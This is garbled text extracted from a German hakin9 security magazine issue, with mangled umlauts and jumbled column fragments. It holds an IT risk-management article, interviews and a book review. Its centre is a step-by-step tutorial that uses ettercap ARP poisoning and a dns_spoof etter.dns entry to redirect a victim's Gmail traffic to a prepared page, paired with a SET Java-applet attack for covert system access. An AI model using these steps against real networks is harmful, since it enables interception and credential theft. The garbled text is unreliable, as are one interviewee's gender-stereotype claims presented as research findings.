Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
